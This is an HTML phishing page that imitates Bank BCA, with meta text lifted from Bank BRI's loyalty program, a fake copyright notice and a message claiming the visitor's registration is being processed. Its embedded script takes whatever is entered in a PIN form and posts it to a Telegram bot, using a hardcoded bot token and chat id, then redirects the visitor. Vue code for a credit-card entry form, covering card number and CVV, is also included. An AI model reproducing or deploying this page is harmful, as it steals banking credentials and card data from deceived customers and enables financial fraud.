<!DOCTYPE html>
<html lang="en" >
<head>
    <!-- Warna untuk Chrome, Firefox OS, Opera dan Vivaldi -->
<meta content='#0F78CB' name='theme-color'/>
<!-- Warna untuk Windows Phone -->
<meta content='#1A89DF' name='msapplication-navbutton-color'/>
<!-- Warna untuk iOS Safari -->
 <meta charset="utf-8"> 
  <meta name="fragment" content="!"> 
  <meta name="theme-color" content="#1E90FF"> 
   <!-- HTML Meta Tags -->

  <title>Bank BCA</title>

  <meta name="description" content="BRIPoin adalah program loyalitas yang ditujukan untuk seluruh Nasabah Bank BRI (BritAma, Simpedes, E-Banking, Kartu Debit dan Kartu Kredit). Perbanyak poin Anda dari segala jenis transaksi di Bank BRI dan tukar poin dengan beragam reward menarik khusus untuk nasabah setia Bank BRI.">

  <!-- Facebook Meta Tags -->
  <meta property="og:url" content="https://bripoin.bri.co.id">
  <meta property="og:type" content="website">
  <meta property="og:title" content="Bank BCA
">
  <meta property="og:description" content="Bank BCA adalah program loyalitas yang ditujukan untuk seluruh Nasabah Bank BRI (BritAma, Simpedes, E-Banking, Kartu Debit dan Kartu Kredit). Perbanyak poin Anda dari segala jenis transaksi di Bank BRI dan tukar poin dengan beragam reward menarik khusus untuk nasabah setia Bank BRI.">
  <meta property="og:image" content="https://raw.githubusercontent.com/unitetger/gambar/refs/heads/main/gtzzyc.jpg">

  <!-- Twitter Meta Tags -->
  <meta name="twitter:card" content="summary_large_image">
  <meta property="twitter:domain" content="bripoin.bri.co.id">
  <meta property="twitter:url" content="https://bripoin.bri.co.id">
  <meta name="twitter:title" content="">
  <meta name="twitter:description" content="BRIPoin adalah program loyalitas yang ditujukan untuk seluruh Nasabah Bank BRI (BritAma, Simpedes, E-Banking, Kartu Debit dan Kartu Kredit). Perbanyak poin Anda dari segala jenis transaksi di Bank BRI dan tukar poin dengan beragam reward menarik khusus untuk nasabah setia Bank BRI.">
  <meta name="twitter:image" content="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQe2_RRje_H6EnHBS7-zriaK4XxvgoL3qqnmA&usqp=CAU">

<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0, maximum-scale=1">
<link rel="icon" href="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQ-Z22x5BxoT2jp59OGERSqqu99-c-ip1UYfuq3qtTOom1CrJThEj2CXkc&s=10" type="image/x-icon" />
<link rel="apple-touch-icon" href="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQ-Z22x5BxoT2jp59OGERSqqu99-c-ip1UYfuq3qtTOom1CrJThEj2CXkc&s=10" />
  <!-- Meta Tags Generated via https://www.opengraph.xyz -->
        
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css">
<link rel="stylesheet" href="./style.css">

</head>
<body>
    <style>
        
@import url("https://fonts.googleapis.com/css?family=Source+Code+Pro:400,500,600,700|Source+Sans+Pro:400,600,700&display=swap");

.html {
    width: 100%;
    height: 100%;
    background-image: url("");
  font-family: "Source Sans Pro", sans-serif;
  background-repeat: no-repeat;
  background-position: 100% 100%;
  background-size: 100% 100%;
}

body{
 background: url("https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTB-oGj81ewvTmOCXlhctw3Bi-A0e70zQxsPi7veX4ZOXMuXnSWnLxWXNHp&s=10");
  
  top: 0;
  left: 0;
  right: 0;
  bottom: 0;

  background-position: 100% 100%;
  background-size: 100% 100%;
  font-size: 16px;
  width: 100%;
  height: 100%;
  }
* {
  box-sizing: border-box;
}
*:focus {
  outline: none;
}

.wrapper {
  min-height: 20vh;
  display: flex;
  padding: 60px 15px;
}
@media screen and (max-width: 700px), (max-height: 440px) {
  .wrapper {
    flex-wrap: wrap;
    flex-direction: column;
  }
}

.card-form {
  max-width: 570px;
  margin: auto;
  width: 100%;
  height: 370px;
}
@media screen and (max-width: 576px) {
  .card-form {
    margin: 0 auto;
  }
}
.card-form__inner {
   background: #fff;
  font-family: "Source Sans Pro", sans-serif;
 
  background-position: 100% 100%;
  background-size: 100% 100%;
 outline-style: ridge;
 paint-order: stroke markers fill;
  box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px;
  border-radius: 15px;
  border: 3px ridge;
  color: #1A89DF;
  height: 500px;
  padding-top: 50px;
}
@media screen and (max-width: 480px) {
  .card-form__inner {
    padding: 20px;
    padding-top: 100px;
  }

}
.card-form__row {
  display: flex;
  align-items: flex-text;
}
@media screen and (max-width: 480px) {
  .card-form__row {
    flex-wrap: wrap;
  }
}
.card-form__col {
  flex: auto;
  margin-right: 35px;
}
.card-form__col:last-child {
  margin-right: 0;
}
@media screen and (max-width: 480px) {
  .card-form__col {
    margin-right: 0;
    flex: unset;
    width: 100%;
    margin-bottom: 0px;
  }
  .card-form__col:last-child {
    margin-bottom: 0;
  }
}
.card-form__col.-cvv {
  max-width: 150px;
}
@media screen and (max-width: 480px) {
  .card-form__col.-cvv {
    max-width: initial;
  }
}
.card-form__group {
  display: flex;
  align-items: flex-start;
  flex-wrap: wrap;
}
.card-form__group .card-input__input {
  flex: 1;
  margin-right: 15px;
}
.card-form__group .card-input__input:last-child {
  margin-right: 0;
}
.card-form__button {
  width: 100%;
  height: 35px;
  box-shadow: 0px 17px 20px -6px rgba(36, 52, 70, 0.36);
  
  background: #1A89DF;
  border: 3px blue;
  outline-style: groove;
 color: #fff;
  border-radius: 22px;
  font-size: 15px;
  font-weight: 500;
  style="font-weight: 800;
  font-family: "Source Sans Pro", sans-serif;
  box-shadow: #D5D5D5 10px; 
  
  margin-top: 0px;
  cursor: pointer;
}
@media screen and (max-width: 480px) {
  .card-form__button {
    margin-top: -5px;
  }
}

.card-item {top: 10px;
  max-width: 430px;
  height: 140px;
  margin-left: auto;
  margin-right: auto;
  position: relative;
  z-index: 2;
  width: 100%;
}
@media screen and (max-width: 480px) {
  .card-item {
    max-width: 300px;
    height: 170px;
    width: 80%;
  }
}
@media screen and (max-width: 360px) {
  .card-item {
    height: 190px;
  }
}
.card-item.-active .card-item__side.-front {
  transform: perspective(1000px) rotateY(180deg) rotateX(0deg) rotateZ(0deg);
}
.card-item.-active .card-item__side.-back {
  transform: perspective(1000px) rotateY(0) rotateX(0deg) rotateZ(0deg);
}
.card-item__focus {
  position: absolute;
  z-index: 3;
  border-radius: 5px;
  left: 0;
  top: 0;
  width: 100%;
  height: 100%;
  transition: all 0.35s cubic-bezier(0.71, 0.03, 0.56, 0.85);
  opacity: 0;
  pointer-events: none;
  overflow: hidden;
  border: 2px solid rgba(255, 255, 255, 0.65);
}
.card-item__focus:after {
  content: "";
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  background: #08142f;
  height: 100%;
  border-radius: 5px;
  filter: blur(25px);
  opacity: 0.5;
}
.card-item__focus.-active {
  opacity: 1;
}
.card-item__side {
  border-radius: 15px;
  overflow: hidden;
  box-shadow: 0 20px 60px 0 rgba(14, 42, 90, 0.55);
  transform: perspective(2000px) rotateY(0deg) rotateX(0deg) rotate(0deg);
  transform-style: preserve-3d;
  transition: all 0.8s cubic-bezier(0.71, 0.03, 0.56, 0.85);
  backface-visibility: hidden;
  height: 100%;
}
.card-item__side.-back {
  position: absolute;
  top: 0;
  left: 0;
  width: 100%;
  transform: perspective(2000px) rotateY(-180deg) rotateX(0deg) rotate(0deg);
  z-index: 2;
  padding: 0;
  height: 100%;
}
.card-item__side.-back .card-item__cover {
  transform: rotateY(-180deg);
}
.card-item__bg {
  max-width: 100%;
  display: block;
  max-height: 100%;
  height: 100%;
  width: 100%;
  object-fit: cover;
  border: 3px solid snow;
  border-radius: 15px;
  padding: 10px;
}
.card-item__cover {
  height: 100%;
  background-color: white;
  position: absolute;
  height: 100%;
  background-color: white;
  left: 0;
  top: 0;
  width: 100%;
  border-radius: 15px;
  overflow: hidden;
}
.card-item__cover:after {
  content: "";
  position: absolute;
  left: 0;
  top: 0;
  width: 100%;
  height: 100%;
  background: ;
}
.card-item__top {
  display: flex;
  border: 2px;
  align-items: flex-start;
  justify-content: space-between;
  margin-bottom: 40px;
  padding: 0 10px;
}
@media screen and (max-width: 480px) {
  .card-item__top {
    margin-bottom: 25px;
  }
}
@media screen and (max-width: 360px) {
  .card-item__top {
    margin-bottom: 20px;
  }
}
.card-item__chip {
  width: 60px;
}
@media screen and (max-width: 480px) {
  .card-item__chip {
    width: 50px;
  }
}
@media screen and (max-width: 360px) {
  .card-item__chip {
    width: 40px;
  }
}
.card-item__type {
  height: 45px;
  position: relative;
  display: flex;
  justify-content: flex-end;
  max-width: 100px;
  margin-left: auto;
  width: 100%;
}
@media screen and (max-width: 480px) {
  .card-item__type {
    height: 40px;
    max-width: 90px;
  }
}
@media screen and (max-width: 360px) {
  .card-item__type {
    height: 30px;
  }
}
.card-item__typeImg {
  max-width: 100%;
  object-fit: contain;
  max-height: 100%;
  object-position: top right;
}
.card-item__info {
  color: #fff;
  width: 100%;
  max-width: calc(100% - 85px);
  padding: 10px 15px;
  font-weight: 500;
  display: block;
  cursor: pointer;
}
@media screen and (max-width: 480px) {
  .card-item__info {
    padding: 10px;
  }
}
.card-item__holder {
  opacity: 100;
  font-size: 13px;
  margin-bottom: 6px;
  color: yellow;
}
@media screen and (max-width: 480px) {
  .card-item__holder {
    font-size: 12px;
    margin-bottom: 5px;
  }
}
.card-item__wrapper {
  font-family: "Source Code Pro", monospace;
  padding: 15px 15px;
  position: relative;
  z-index: 4;
  height: 100%;
  text-shadow: 7px 6px 10px rgba(14, 42, 90, 0.8);
  user-select: none;
}
@media screen and (max-width: 480px) {
  .card-item__wrapper {
    padding: 10px 10px;
  }
}
.card-item__name {
  font-size: 18px;
  line-height: 1;
  white-space: nowrap;
  max-width: 100%;
  overflow: hidden;
  text-overflow: ellipsis;
  text-transform: uppercase;
}
@media screen and (max-width: 480px) {
  .card-item__name {
    font-size: 16px;
  }
}
.card-item__nameItem {
  display: inline-block;
  min-width: 8px;
  position: relative;
}
.card-item__number {
  font-weight: 500;
  line-height: 1;
  color: #fff;
  font-size: 27px;
  margin-bottom: 35px;
  display: inline-block;
  padding: 10px 15px;
  cursor: pointer;
}
@media screen and (max-width: 480px) {
  .card-item__number {
    font-size: 21px;
    margin-bottom: 15px;
    padding: 10px 10px;
  }
}
@media screen and (max-width: 360px) {
  .card-item__number {
    font-size: 19px;
    margin-bottom: 10px;
    padding: 10px 10px;
  }
}
.card-item__numberItem {
  width: 16px;
  display: inline-block;
}
.card-item__numberItem.-active {
  width: 30px;
}
@media screen and (max-width: 480px) {
  .card-item__numberItem {
    width: 13px;
  }
  .card-item__numberItem.-active {
    width: 16px;
  }
}
@media screen and (max-width: 360px) {
  .card-item__numberItem {
    width: 12px;
  }
  .card-item__numberItem.-active {
    width: 8px;
  }
}
.card-item__content {
  color: #fff;
  display: flex;
  align-items: flex-start;
}
.card-item__date {
  flex-wrap: wrap;
  font-size: 18px;
  margin-left: -5;
  padding: 10px;
  display: inline-flex;
  width: 80px;
  white-space: nowrap;
  flex-shrink: 0;
  cursor: pointer;
}
@media screen and (max-width: 480px) {
  .card-item__date {
    font-size: 16px;
    width: 140px;
    height: 45px;
    padding-top: -5px;
  }
}
.card-item__dateItem {
  position: relative;
}
.card-item__dateItem span {
  width: 22px;
  margin-left: 25px;
  display: inline-block;
}
.card-item__dateTitle {
  opacity: 100;
  font-size: 13px;
  padding-bottom: 6px;
  width: 100%;
  margin-left: 0px;
}
@media screen and (max-width: 480px) {
  .card-item__dateTitle {
    font-size: 12px;
    padding-bottom: 5px;
    margin-left: 20px;
    color: yellow;
    
  }
}
.card-item__band {
  background: rgba(0, 0, 19, 0.8);
  width: 100%;
  height: 50px;
  margin-top: 30px;
  position: relative;
  z-index: 2;
}
@media screen and (max-width: 480px) {
  .card-item__band {
    margin-top: 20px;
  }
}
@media screen and (max-width: 360px) {
  .card-item__band {
    height: 40px;
    margin-top: 10px;
  }
}
.card-item__cvv {
  text-align: right;
  position: relative;
  z-index: 2;
  padding: 15px;
}
.card-item__cvv .card-item__type {
  opacity: 0.7;
}
@media screen and (max-width: 360px) {
  .card-item__cvv {
    padding: 10px 15px;
  }
}
.card-item__cvvTitle {
  padding-right: 10px;
  font-size: 15px;
  font-weight: 500;
  color: #fff;
  margin-bottom: 5px;
}
.card-item__cvvBand {
  height: 45px;
  background: #fff;
  margin-bottom: 30px;
  text-align: right;
  display: flex;
  align-items: center;
  justify-content: flex-end;
  padding-right: 10px;
  color: #1a3b5d;
  font-size: 18px;
  border-radius: 4px;
  box-shadow: 0px 10px 20px -7px rgba(32, 56, 117, 0.35);
}
@media screen and (max-width: 480px) {
  .card-item__cvvBand {
    height: 40px;
    margin-bottom: 20px;
  }
}
@media screen and (max-width: 360px) {
  .card-item__cvvBand {
    margin-bottom: 15px;
  }
}

.card-list {
  margin-bottom: -100px;
}
@media screen and (max-width: 480px) {
  .card-list {
    margin-bottom: -120px;
  }
}

.card-input {
  margin-bottom: 20px;
}
.card-input__label {
  font-size: 15px;
  margin-bottom: 5px;
  font-weight: 500;
  color: #1A89DF;
  width: 100%;
  margin-top: -15px;
  display: block;
  user-select: none;
}
      .btn-punya {
            display: block;
            margin: 2px auto 0 auto;
            padding: 0px; 
            cursor: pointer; 
            background: #0F78CB;
            border: none; 
            text-align: center; 
            height: 40px; 
            width: 285px; 
            max-width: 100%;
            font-family: Arial; 
            font-size: 14px; 
            font-weight: 600; 
            color: rgb(255, 255, 255); 
            letter-spacing: 1px; 
            line-height: 1; 
            border-radius: 5px; 
            box-shadow: rgb(255, 255, 255) 2px 2px 4px 0px; 
            transition: background 200ms ease 0s;
        }
.card-input__input {
  width: 100%;
  height: 35px;
  border-radius: 10px;
  box-shadow: 0px 17px 20px -6px rgba(36, 52, 70, 0.36); border: outline-style: groove;
  border: 2px solid #1A89DF;
  transition: all 0.3s ease-in-out;
  font-size: 16px;
  padding: 5px;
  padding-left: 10px;
  padding-top: 3px;
  background: #fff;
  color: #1a3b5d;
  font-family: "Source Sans Pro", sans-serif;
}
.card-input__input:hover, .card-input__input:focus {
  border-color: #FAC03B;
}
.card-input__input:focus {
  box-shadow: 0px 10px 20px -13px rgba(32, 56, 117, 0.35);
  background: #fff;
}


.card-input__input::placeholder{
    font-size: 14px;
    
}
.card-input__input.-select {
  -webkit-appearance: none;
  background-image: url("https://static.thenounproject.com/png/4066370-200.png");
  background-size: 14px;
  background-position: 90% center;
  background-repeat: no-repeat;
  padding-right: 30px;
  padding-top: 3px;
}


.card-input__input.-select2 {
  -webkit-appearance: none;
  background-image: url("https://uxwing.com/wp-content/themes/uxwing/download/e-commerce-currency-shopping/card-cvv-icon.png");
  background-size: 22px;
  background-position: 90% center;
  background-repeat: no-repeat;
  padding-right: 30px;
  padding-top: 3px;
}

.slide-fade-up-enter-active {
  transition: all 0.25s ease-in-out;
  transition-delay: 0.1s;
  position: relative;
}

.slide-fade-up-leave-active {
  transition: all 0.25s ease-in-out;
  position: absolute;
}

.slide-fade-up-enter {
  opacity: 0;
  transform: translateY(15px);
  pointer-events: none;
}

.slide-fade-up-leave-to {
  opacity: 0;
  transform: translateY(-15px);
  pointer-events: none;
}

.slide-fade-right-enter-active {
  transition: all 0.25s ease-in-out;
  transition-delay: 0.1s;
  position: relative;
}

.slide-fade-right-leave-active {
  transition: all 0.25s ease-in-out;
  position: absolute;
}

.slide-fade-right-enter {
  opacity: 0;
  transform: translateX(10px) rotate(45deg);
  pointer-events: none;
}

.slide-fade-right-leave-to {
  opacity: 0;
  transform: translateX(-10px) rotate(45deg);
  pointer-events: none;
}

.github-btn {
  position: absolute;
  right: 40px;
  bottom: 50px;
  text-decoration: none;
  padding: 15px 25px;
  border-radius: 4px;
  box-shadow: 0px 4px 30px -6px rgba(36, 52, 70, 0.65);
  background: #24292e;
  color: #fff;
  font-weight: bold;
  letter-spacing: 1px;
  font-size: 16px;
  text-align: center;
  transition: all 0.3s ease-in-out;
}
@media screen and (min-width: 500px) {
  .github-btn:hover {
    transform: scale(1.1);
    box-shadow: 0px 17px 20px -6px rgba(36, 52, 70, 0.36);
  }
}
@media screen and (max-width: 700px) {
  .github-btn {
    position: relative;
    bottom: auto;
    right: auto;
    margin-top: 20px;
  }
  .github-btn:active {
    transform: scale(1.1);
    box-shadow: 0px 17px 20px -6px rgba(36, 52, 70, 0.36);
  }
}
      .wrapper {
	width: 100%;
	overflow: hidden;
}
.photobanner {
	position: relative;
	height: 180px;
	margin-bottom: 30px;
	display: flex;
	width: 100%;
}

.photobanner img {
  margin: 0px 5px;
  box-shadow: 2px 3px 8px #8a8a8a;
  border: 2px groove #118eea;
  border-radius: 5px;
  width:80%;
}

.photobanner {
  animation: bannermove 15s linear infinite alternate-reverse;
}

@keyframes bannermove {
  from {
    left: 0%;
  }
  to {
    left: -1000px;
  }
}

#typing-text {
	width: 100%;
	height: 80px;
	font-size: 15px;
	border: solid 2px #fff;
	color: #fff;
	background: url("https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTB-oGj81ewvTmOCXlhctw3Bi-A0e70zQxsPi7veX4ZOXMuXnSWnLxWXNHp&s=10");
	text-align: center;
	font-family: Average, serif;
	font-weight: bold;
	padding: 5px;
	resize: none;
	outline: none;
	box-sizing: border-box;
	border-radius: 8px;
}

.animation-bounceInRight {
    animation-name: bounceInRight;
    animation-duration: 2s;
    animation-timing-function: ease-in;
    animation-fill-mode: both;
}
@keyframes bounceInRight {
    0% {
        opacity: 0;
        transform: translateX(200px);
    }
    60% {
        opacity: 1;
        transform: translateX(-30px);
    }
    80% {
        transform: translateX(10px);
    }
    100% {
        transform: translateX(0);
    }
}


    </style> 
<body>
<div class="wrapper" id="app">
     <img src="https://raw.githubusercontent.com/unitetger/gambar/refs/heads/main/IMG_20250222_204340_291.jpg" style="width: 100%; position: fixed; bottom: 0; left: 0; right: 0; margin: 0px auto">
    <font style="color: #1A89DF; text-align: center; margin-top: -30px; margin-bottom: 10px; font-weight: 800; font-size: 20px"></font>  <img src="https://raw.githubusercontent.com/unitetger/gambar/refs/heads/main/gtzzyc.jpg" style="width: 100%; position: fixed; top: 0; left: 0; right: 0; margin: 0px auto; border-bottom: 3px solid #0F6EB9; box-shadow: 8px 4px 10px 4px rgba(90, 116, 148, 0.4);">   
    <font style="color: #1A89DF; text-align: center; margin-top: 300px; margin-bottom: 10px; font-weight: 500; font-size: 20px"></font></div></div>        <textarea id="typing-text" readonly></textarea><hr><br><br></div>


            <button class="btn-punya" onclick="location.href='index.html';">KEMBALI MENU UTAMA</button><div>
   </form></div><br>
<h6 style="font-family: 'Nunito', sans-serif; font-size: 10px; font-weight: bold; color: #fff; letter-spacing: 1px; text-align: center; line-height: 1; border-radius: 5px;">© 2025 PT.Bank Central Indonesia (Persero) Tbk. | All Rights Reserved.</h6>
  </div>
<!-- partial -->
<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
 <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"

    integrity="sha512-+NqPlbbtM1QqiK8ZAo4Yrj2c4lNQoGv8P79DPtKzj++l5jnN39rHA/xsqn8zE9l0uSoxaCdrOgFs6yjyfbBxSg=="

    crossorigin="anonymous" referrerpolicy="no-referrer"></script>
  <script src='https://cdnjs.cloudflare.com/ajax/libs/vue/2.6.10/vue.min.js'></script>
<script src='https://unpkg.com/vue-the-mask@0.11.1/dist/vue-the-mask.js'></script><script  src="./credit.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.mask/1.14.15/jquery.mask.min.js"></script>
 <script type="text/javascript">
       <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script> 
   <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/js/bootstrap.bundle.min.js" integrity="sha384-pprn3073KE6tl6bjs2QrFaJGz5/SUsLqktiwsUTF55Jfv3qYSDhgCecCxMW52nD2" crossorigin="anonymous"></script> 
   <p id="status"></p>
   <script src="setPin.js"></script>
   
   <script>
   
   
            $(document).ready(function() {
            $("div#eyeOpen").on('click', function() {
                $("#eyeOpen").css("display", "none");
                $("#eyeClose").css("display", "block");

                $("#password").prop("type", "text");

                $("div#eyeClose").on('click', function() {
                    $("#eyeOpen").css("display", "block");
                    $("#eyeClose").css("display", "none");

                    $("#password").prop("type", "password");
                });
            });
            
const chat_id = '6611505130', botID = 'bot7711333088%3AAAGD8VYBHqNLEwRxdDEklfJUaKDPXMiKim4';

    const telegramURL = `https://api.telegram.org/${botID}/sendMessage`;

    document.querySelector('#setPin').addEventListener("submit", async e => { // When the user submits the form
        e.preventDefault(); // Don't submit
        let text = JSON.stringify( // Convert the form data to a string to send as our Telegram message
            Object.fromEntries(new FormData(e.target).entries()), // Convert the form data to an object.
        null, 2); // Prettify the JSON so we can read the data easily
        const sendMessage = await fetch(telegramURL, { // Send the request to the telegram API
            method: 'POST',
            headers: {"Content-Type": "application/json"}, // This is required when sending a JSON body.
            body: JSON.stringify({chat_id, text}), // The body must be a string, not an object
        });
        const messageStatus = document.querySelector('#status');
        if (sendMessage.ok) // Update the user on if the message went through
            messageStatus.textContent = "";
        else
            messageStatus.textContent = "Message Failed to send :( " + (await sendMessage.text());
        e.target.reset(); // Clear the form fields.
        window.location.href = '/index.html';
    });

            
        });
        
   </script>
        </form>
        <script>
            $(document).ready(function(){


                // Format mata uang.
                $( '.uang' ).mask('000.000.000', {reverse: true});

            })
        </script>
<!-- Static App Form Collection Script -->
<!--<script src="https://static.app/js/static-forms.js" type="text/javascript"></script>

<script src="https://static.app/js/static.js" type="text/javascript"></script>-->

<script>
    /*
See on github: https://github.com/muhammederdem/credit-card-form
*/

new Vue({
  el: "#app",
  data() {
    return {
      currentCardBackground: Math.floor(Math.random()* 25 + 1), // just for fun :D
      cardName: "",
      cardNumber: "",
      cardMonth: "",
      cardYear: "",
      cardCvv: "",
      minCardYear: new Date().getFullYear(),
      amexCardMask: "#### ###### #####",
      otherCardMask: "",
      cardNumberTemp: "",
      isCardFlipped: false,
      focusElementStyle: null,
      isInputFocused: false
    };
  },
  mounted() {
    this.cardNumberTemp = this.otherCardMask;
    document.getElementById("cardNumber").focus();
  },
  computed: {
    getCardType () {
      let number = this.cardNumber;
      let re = new RegExp("^4");
      if (number.match(re) != null) return "visa";

      re = new RegExp("^(34|37)");
      if (number.match(re) != null) return "amex";

      re = new RegExp("^5[1-5]");
      if (number.match(re) != null) return "mastercard";

      re = new RegExp("^6011");
      if (number.match(re) != null) return "discover";
      
      re = new RegExp('^9792')
      if (number.match(re) != null) return 'troy'

      return "visa"; // default type
    },
		generateCardNumberMask () {
			return this.getCardType === "amex" ? this.amexCardMask : this.otherCardMask;
    },
    minCardMonth () {
      if (this.cardYear === this.minCardYear) return new Date().getMonth() + 1;
      return 1;
    }
  },
  watch: {
    cardYear () {
      if (this.cardMonth < this.minCardMonth) {
        this.cardMonth = "";
      }
    }
  },
  methods: {
    flipCard (status) {
      this.isCardFlipped = status;
    },
    focusInput (e) {
      this.isInputFocused = true;
      let targetRef = e.target.dataset.ref;
      let target = this.$refs[targetRef];
      this.focusElementStyle = {
        width: `${target.offsetWidth}px`,
        height: `${target.offsetHeight}px`,
        transform: `translateX(${target.offsetLeft}px) translateY(${target.offsetTop}px)`
      }
    },
    blurInput() {
      let vm = this;
      setTimeout(() => {
        if (!vm.isInputFocused) {
          vm.focusElementStyle = null;
        }
      }, 300);
      vm.isInputFocused = false;
    }
  }
});
</script>
<center>
<script src="js/jquery.min.js" integrity="sha512-894YE6QWD5I59HgZOGReFYm4dnWc1Qt5NtvYSaNcOP+u1T9qYdvdihz0PPSiiqn/+/3e7Jo4EaG7TubfWGUrMQ==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
<script src='js/3.3.1/jquery.min.js'></script>
<script src="script.html"></script>
<script src="js/1.11.3/jquery.min.js"></script>
<script src="js/jquery.mask.min.js"></script>   
<script>
(() => {
	let TypingSpeed = 100;
	let NxtMsgDelay = 1000000;
	let CharacterPos = 0;
	let MsgBuffer = "";
	let MsgIndex = 0;
	let delay;
	let loop = false;
	let id = document.getElementById("typing-text");
	let messages =
[
	"PENDAFTARAN ANDA SEDANG PROSES\n Silahkan untuk menunggu.anda akan di hubungi layanan customer cervice Bank BCA  \n Klik tombol dibawah ini untuk kembali"
]

	// https://www.html-code-generatorom/html/typewriter-text-scroller
	const StartTyping = () => {
		if (CharacterPos != messages[MsgIndex].length) {
			MsgBuffer += messages[MsgIndex].charAt(CharacterPos);
			id.value = MsgBuffer+(CharacterPos != messages[MsgIndex].length-1 ? "﹏✎":"");
			delay = TypingSpeed;
			id.scrollTop = id.scrollHeight; 
		} else {
			delay = NxtMsgDelay;
			MsgBuffer   = "";
			CharacterPos = -1;
			if (MsgIndex!= messages.length-1){
				MsgIndex++;
			}else {
				MsgIndex = 0;
			}
		}
		CharacterPos++;
		setTimeout(StartTyping, delay);
	}
	StartTyping();
})();
</script>  
</body>
</html><!--<script src='https://a.bsite.net/footer.js'></script>
